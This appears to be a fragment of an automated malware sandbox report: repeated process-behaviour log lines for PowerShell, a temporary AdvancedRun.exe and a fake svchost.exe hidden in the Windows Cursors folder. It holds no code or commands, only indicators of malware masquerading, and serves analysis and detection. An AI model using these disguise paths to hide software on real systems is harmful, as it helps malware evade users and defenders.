Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Process information set: NOOPENFILEERRORBOX
